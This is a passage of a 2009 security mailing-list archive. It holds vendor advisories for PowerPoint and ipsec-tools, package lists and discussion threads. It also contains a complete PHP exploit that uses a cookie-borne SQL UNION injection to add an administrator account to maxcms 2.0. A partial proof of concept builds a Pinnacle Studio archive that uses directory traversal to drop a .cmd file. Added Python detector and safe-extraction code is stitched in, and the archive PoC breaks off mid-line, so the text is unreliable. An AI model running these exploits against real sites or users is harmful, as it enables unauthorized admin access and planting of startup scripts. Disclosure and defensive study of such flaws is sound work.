  Size/MD5: 1044 25c3b0f1abb252aeb6135f5dd8782b8e
http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg.orig.tar.gz
  Size/MD5:  3117412 b992a0ff585020cd5f586ac8046ad335

  Architecture independent packages:


http://security.ubuntu.com/ubuntu/pool/universe/k/kvm/kvm-source_62+dfsg-0ubuntu8.2_all.deb
  Size/MD5:   146586 020e3cf65f1e6ef6051aaf2b85bdfff8

  amd64 architecture (Athlon64, Opteron, EM64T Xeon):


http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg-0ubuntu8.2_amd64.deb
  Size/MD5:   770350 af69aba1e0a6ecd885ed13be5ddb32c1

  i386 architecture (x86 compatible Intel/AMD):


http://security.ubuntu.com/ubuntu/pool/main/k/kvm/kvm_62+dfsg-0ubuntu8.2_i386.deb
  Size/MD5:   709496 be95457ef9553f5197f8a23a67c4b713






iDefense Security Advisory 05.12.09: Microsoft PowerPoint Notes Container Heap Corruption Vulnerability

2009-05-13 Thread iDefense Labs
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

iDefense Security Advisory 05.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
May 12, 2009

I. BACKGROUND

Microsoft PowerPoint is an application used for constructing
presentations, and comes with the Microsoft Office suite. For more
information, see the vendor's site found at the following link.

http://office.microsoft.com/en-us/powerpoint/default.aspx

II. DESCRIPTION

Remote exploitation of a heap corruption vulnerability in Microsoft
Corp.'s PowerPoint could allow an attacker to execute arbitrary code
with the privileges of the current user.

The vulnerability occurs when parsing the Notes container inside of the
PowerPoint Document stream. This container is used to hold records
related to notes that appear on the slides. By inserting a value into a
container, it is possible to trigger a memory corruption vulnerability.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the user opening the file. To exploit this
vulnerability, an attacker needs to convince a user to open a malicious
file. If the targeted user is running PowerPoint 2000, and the Office
Document Open Confirmation Tool is not installed, then it is possible
to exploit this vulnerability directly through the browser.

Due to the nature of the vulnerability, relatively precise control of
the process memory layout is needed to successfully exploit this
vulnerability. iDefense Labs has developed exploit code that
successfully exploits this vulnerability.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in the
following versions of PowerPoint:

PowerPoint 2000 SP3

PowerPoint 2002 (XP) SP3

PowerPoint 2003 SP2

PowerPoint 2003 SP3

PowerPoint 2007, PowerPoint 2007 SP1, and PowerPoint Viewer 2003 are not
affected.

V. WORKAROUND

Since PowerPoint Viewer 2003 is not affected, using it to view untrusted
or unexpected PowerPoint files is a valid workaround.

VI. VENDOR RESPONSE

Microsoft has released a patch which addresses this issue. For more
information, consult their advisory at the following URL:

http://www.microsoft.com/technet/security/Bulletin/MS09-017.mspx

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2009-1130 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

10/22/2008  - Initial Contact
10/22/2008  - Initial Vendor Response
10/22/2008  - PoC Requested
11/05/2008  - PoC Sent
11/05/2008  - Vendor Case Number Assigned
11/07/2008  - Vendor Status Update
02/19/2009  - Vendor Status Update
05/12/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerserv...@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFKCgAEbjs6HoxIfBkRAvFeAKCB8mOVbEfFLi4XHc/a88DCfYk+IgCgxYng
GerX8gc4MBh5dhd8o2tXDVQ=
=vk19
-END PGP SIGNATURE-


Re: FormMail 1.92 Multiple Vulnerabilities

2009-05-13 Thread David Cantrell

ascii wrote:


FormMail 1.92 Multiple Vulnerabilities  ...


The author's own webpage about formmail mentions the NMS project at the 
bottom of the page, about which he says:


 While the free code found at my web site has not evolved much in
  recent years, the general programming practices and standards of CGI
  programs have. nms is an attempt by very active programmers in the
  Perl community to bring the *quality of code for these types of
  programs up to date and eliminate some of the bad programming
  practices and bugs* found in the existing Matt's Script Archive code.

 I would highly recommend downloading the nms versions if you wish to
  learn CGI programming. The code you find at Matt's Script Archive is
  not representative of how even I would code these days. *My interests
  and activities have moved on, however, and I just have not found the
  time to update all of my scripts*. One of the major reasons for this
  is that they work for many people. For this reason, I will continue to
  provide them to the public, but am also *pleased to make you aware of
  well-coded alternatives*. 

(my emphasis)

which to me looks like he's already addressed the issue by recommending 
that you use NMS formmail if you care about the quality of the code and 
any bugs.


--
David Cantrell
Outcome Technologies Ltd
BUPA House, 15-19 Bloomsbury Way, London WC1A 2BA
Registered in England, No: 3829851


Re: The security tools list, new version with more than 200 new tools!

2009-05-13 Thread Ying
Hi Ignace,
Your question is perfectly normal. Well, I'm doing this in order to have a
large referral center for security tools: for when you eventually need some
tool somewhere and don't know any, want to try alternatives to the tools you
use regularly, or have a proprietary tool and want to share it with everyone.
For all of that I think it is a good idea to have a site that combines the
largest number of them and ranks them as well as possible, so that it can
help in all these cases.
The reason for not having added the tools available in BackTrack, FIRE,
Phlax, Helix, etc. is that, despite the contributions all of you are
making (which I greatly appreciate), almost all the tools were introduced
by hand, by myself. That takes time, and that's why I'm going slowly,
because I do this in my spare time. But of course I will introduce all of
these tools.

Regards

On Wed, 13-05-2009 at 11:20 +, Ignace K. Kueviakoé wrote:
 Hi Ying,
 I would like to encourage you for what you're doing.
 And at the same time, I'm wondering why all the software included in
 BackTrack does not yet appear in the lists.
 If there is any reason for that, I'd advise adding those applications
 from the BackTrack and Helix distributions.
 Regards
 ignace
 
 --- On Tue 12.5.09, Ying ropst...@gmail.com wrote:
 
 From: Ying ropst...@gmail.com
 Subject: Re: The security tools list, new version with more than
 200 new tools!
 To: Stephen Mullins steve.mullins.w...@gmail.com
 Cc: bugtraq@securityfocus.com bugtraq@securityfocus.com
 Date: Tuesday 12 May 2009, 20:28
 
 Hi Stephen,
 you're welcome. I would like the list to be for everyone and by
 everyone. That is why it is public and accepts contributions from
 anyone who wants to help (help that is very welcome).
 
 Regards
 
 On Tue, 12-05-2009 at 13:52 -0400, Stephen Mullins wrote:
  Nice list.  Thanks for doing the work to compile that and making it
  available to the public.
  
  On Tue, May 12, 2009 at 9:02 AM, Ying ropst...@gmail.com wrote:
  
   Hello everyone,
   I would like to inform you that the new list of security tools, and
   the website, has been updated. The changes were:
   - The information was classified by type and operating system.
   - I have added new types of tools, adding not only tools but also
   dictionaries and rainbow tables, for example.
   Thank you very much to all who have worked on the list with your
   contributions. I hope you keep doing so.
   Remembering the URL of the site:
  
   http://securitytoolslist.domandhost.com
  
   Best regards.
 
 
 



Re: FormMail 1.92 Multiple Vulnerabilities

2009-05-13 Thread ascii
David Cantrell wrote:
 which to me looks like he's already addressed the issue by recommending
 that you use NMS formmail if you care about the quality of the code and
 any bugs.

Dear David,

telling people to use different software doesn't automatically fix
issues.

As we tested FormMail and want to warn people who have deployed FormMail
or will deploy FormMail, we posted an advisory for FormMail. Hope this
opens your mind.

Bye,
ascii
ush.it


maxcms2.0 creat new admin exploit

2009-05-13 Thread info
<?php

print_r('
+---+
maxcms2.0 creat new admin exploit
by Securitylab.ir
+---+
');

if ($argc < 3) {
print_r('
+---+
Usage: php '.$argv[0].' host path
host:  target server (ip/hostname)
path:  path to maxcms
Example:
php '.$argv[0].' localhost /maxcms2/
+---+
');
exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host = $argv[1];
$path = $argv[2];
$name = rand(1,1);
// POST body: the fields of the "add manager" form
$cmd = 'm_username=securitylab'.$name.'&m_pwd=securitylab&m_pwd2=securitylab&m_level=0';

$resp = send($cmd);
// the page answers with a javascript alert() when the account was added
// (eregi() was removed in PHP 7, so the check uses stripos())
if (stripos($resp, 'alert') === false) {echo "[~]bad!,exploit failed";exit;}

print_r('
+---+
[+]cool,exploit seccuss
[+]you have add a new adminuser securitylab'.$name.'/securitylab
+---+
');

// build the raw HTTP request and return the server response
function send($cmd)
{
global $host, $path;
$message = "POST ".$path."admin/admin_manager.asp?action=add HTTP/1.1\r\n";
$message .= "Accept: */*\r\n";
$message .= "Referer: http://$host$path\r\n";
$message .= "Accept-Language: zh-cn\r\n";
$message .= "Content-Type: application/x-www-form-urlencoded\r\n";
$message .= "User-Agent: securitylab\r\n";
$message .= "X-Forwarded-For:1.1.1.1\r\n";
$message .= "Host: $host\r\n";
$message .= "Content-Length: ".strlen($cmd)."\r\n";
// session cookie sent with the request, exactly as posted
$message .= "Cookie: m_username=securitylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin; m_level=0; checksecuritylab'%20union%20select%20663179683474,0%20from%20m_manager%20where%20m_username%3d'admin=cf144fd7a325d1088456838f524ae9d7\r\n";
$message .= "Connection: Close\r\n\r\n";
$message .= $cmd;
echo $message;

$fp = fsockopen($host, 80);
fputs($fp, $message);

$resp = '';
while ($fp && !feof($fp))
$resp .= fread($fp, 1024);
echo $resp;
return $resp;
}
?>
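Added here as an example, not part of the post above: a small detector that pulls the Cookie header out of a raw request shaped like the one the script builds and flags any cookie name or value that decodes to a closing quote followed by UNION SELECT. The sample request is constructed from the headers above; the host name is a placeholder.

```python
import re
from urllib.parse import unquote

# A quote that closes a string literal followed by UNION SELECT, checked after
# percent-decoding so %20 / + spacing and mixed case do not hide it.
SQLI_RE = re.compile(r"'\s*union\s+select\b", re.IGNORECASE)

def parse_request(raw: str) -> dict:
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"request_line": lines[0], "headers": headers, "body": body}

def cookie_pairs(cookie_header: str):
    """Yield percent-decoded (name, value) pairs from a Cookie header."""
    for part in cookie_header.split(";"):
        name, _, value = part.partition("=")
        if name.strip():
            yield unquote(name.strip()), unquote(value.strip().replace("+", " "))

def find_cookie_sqli(raw: str) -> list:
    """Return the decoded names of cookies whose name or value carries the injection."""
    req = parse_request(raw)
    hits = []
    for name, value in cookie_pairs(req["headers"].get("cookie", "")):
        if SQLI_RE.search(name) or SQLI_RE.search(value):
            hits.append(name)
    return hits

# Constructed sample: the request shape the post builds; the host is a placeholder.
SAMPLE_REQUEST = (
    "POST /maxcms2/admin/admin_manager.asp?action=add HTTP/1.1\r\n"
    "Host: target.example\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Cookie: m_username=securitylab'%20union%20select%20663179683474,0"
    "%20from%20m_manager%20where%20m_username%3d'admin; m_level=0\r\n"
    "Connection: Close\r\n\r\n"
    "m_username=x&m_pwd=y&m_pwd2=y&m_level=0"
)
# Same request with an ordinary user name in the cookie, for comparison.
BENIGN_REQUEST = SAMPLE_REQUEST.replace(
    "securitylab'%20union%20select%20663179683474,0"
    "%20from%20m_manager%20where%20m_username%3d'admin", "alice")

if __name__ == "__main__":
    print(find_cookie_sqli(SAMPLE_REQUEST))  # ['m_username']
    print(find_cookie_sqli(BENIGN_REQUEST))  # []
```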


Pinnacle Studio 12 Hollywood FX Compressed Archive (.hfz) directory traversal vulnerability poc

2009-05-13 Thread ipsdix
<?php
/*
Pinnacle Studio 12 Hollywood FX Compressed Archive (.hfz) directory
traversal vulnerability poc
by Nine:Situations:Group::pyrokinesis

Our site: http://retrogod.altervista.org/
Software site: http://www.pinnaclesys.com/

Some keys exported from the registry:

[HKEY_CLASSES_ROOT\.hfz]
@="hfzfile"

[HKEY_CLASSES_ROOT\.hfz\hfzfile]

[HKEY_CLASSES_ROOT\.hfz\hfzfile\ShellNew]

[HKEY_CLASSES_ROOT\hfzfile]
@="Hollywood FX Compressed Archive"

[HKEY_CLASSES_ROOT\hfzfile\DefaultIcon]
@="C:\\WINDOWS\\Installer\\{D041EB9E-890A-4098-8F94-51DA194AC72A}\\_A7BEE02B_CF3C_4710_85A0_92A3876E6F9C,0"

[HKEY_CLASSES_ROOT\hfzfile\shell]

[HKEY_CLASSES_ROOT\hfzfile\shell\Open]

[HKEY_CLASSES_ROOT\hfzfile\shell\Open\command]
@="\"C:\\Documents and Settings\\All Users.WINDOWS\\Documenti\\Pinnacle\\Content\\HollywoodFX\\InstallHFZ.exe\" \"%1\""
"command"=hex(7):70,00,7e,00,46,00,78,00,6b,00,3f,00,49,00,63,00,69,00,38,00,\
79,00,2b,00,37,00,32,00,6f,00,21,00,31,00,61,00,68,00,31,00,48,00,46,00,58,\
00,3e,00,49,00,4d,00,53,00,27,00,73,00,50,00,7a,00,2e,00,6a,00,3d,00,34,00,\
70,00,41,00,5b,00,4e,00,72,00,64,00,29,00,70,00,76,00,20,00,22,00,25,00,31,\
00,22,00,00,00,00,00

Usually files are decompressed into a Pinnacle effects folder...
Problem is ... that .hfz files can be used to overwrite files on the target
system, or to place scripts in Startup folders, by directory traversal attacks,
and InstallHFZ.exe decompresses them with no prompts!
Just modified an existing .hfz file and here is the dump ...
Also I experienced some crashes in doing this... investigating...

*/

// entry name stored in the archive: eight "..\" components, then the file name
$path = "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd";

$payload =
"\x48\x46\x58\x5a\x48\x46\x58\x5a\x9c\x07\x00\x00\x49\x00\x00\x00".
"\x00\x21\x00\x00\x00\x7e". $path.
"\x65\x07\x00\x00\xa8\x1c\x00\x00\x8d\xc2\x71\x5a".
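Added here as an example, not part of the PoC above and not Pinnacle's code: the check an extractor needs before writing an archive entry to disk, so that an entry name like the $path above cannot leave the destination folder. The destination folder and the entry list are constructed placeholders.

```python
import posixpath
import re

# A drive-letter prefix (C:) marks an absolute entry name.
DRIVE = re.compile(r"^[A-Za-z]:")

def safe_extract_path(dest_dir: str, entry_name: str):
    """Return the path an archive entry may be written to under dest_dir, or
    None when the entry would land outside it (directory traversal)."""
    if "\x00" in entry_name:
        return None                      # a NUL would truncate the name later
    name = entry_name.replace("\\", "/")  # Windows extractors accept both separators
    if name.startswith("/") or DRIVE.match(name):
        return None                      # absolute path or UNC share (//server/...)
    parts = [p for p in name.split("/") if p not in ("", ".")]
    if not parts or ".." in parts:
        return None                      # any '..' component can escape dest_dir
    dest = posixpath.normpath(dest_dir.replace("\\", "/"))
    target = posixpath.normpath(posixpath.join(dest, *parts))
    if not target.startswith(dest + "/"):
        return None                      # belt and braces after normalisation
    return target

def plan_extraction(dest_dir: str, entry_names):
    """Split entry names into (accepted {name: target}, rejected [names])."""
    accepted, rejected = {}, []
    for name in entry_names:
        target = safe_extract_path(dest_dir, name)
        if target is None:
            rejected.append(name)
        else:
            accepted[name] = target
    return accepted, rejected

# Constructed sample: the traversal entry from the PoC beside benign and absolute names.
DEST = "C:/Pinnacle/Content/HollywoodFX"      # placeholder destination folder
ENTRIES = [
    "..\\..\\..\\..\\..\\..\\..\\..\\pyro.cmd",
    "Effects\\flash.hfx",
    "Effects\\.\\sub\\..\\..\\..\\escape.cmd",
    "C:\\Windows\\x.cmd",
]

if __name__ == "__main__":
    ok, bad = plan_extraction(DEST, ENTRIES)
    print(ok)   # {'Effects\\flash.hfx': 'C:/Pinnacle/Content/HollywoodFX/Effects/flash.hfx'}
    print(bad)  # the three other entries
```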

[ MDVSA-2009:112 ] ipsec-tools

2009-05-13 Thread security

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___

 Mandriva Linux Security Advisory MDVSA-2009:112
 http://www.mandriva.com/security/
 ___

 Package : ipsec-tools
 Date: May 13, 2009
 Affected: 2008.1, 2009.0, 2009.1, Corporate 4.0
 ___

 Problem Description:

 racoon/isakmp_frag.c in ipsec-tools before 0.7.2 allows remote
 attackers to cause a denial of service (crash) via crafted fragmented
 packets without a payload, which triggers a NULL pointer dereference
 (CVE-2009-1574).
 
 Updated packages are available that bring ipsec-tools to version
 0.7.2 for Mandriva Linux 2008.1/2009.0/2009.1, which provides numerous
 bug fixes over the previous 0.7.1 version and also corrects this
 issue. ipsec-tools for Mandriva Linux Corporate Server 4 has been
 patched to address this issue.
 
 Additionally, the flex package required to build ipsec-tools has
 been fixed to resolve ipsec-tools build problems and is also provided
 with this update.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1574
 ___

 Updated Packages:
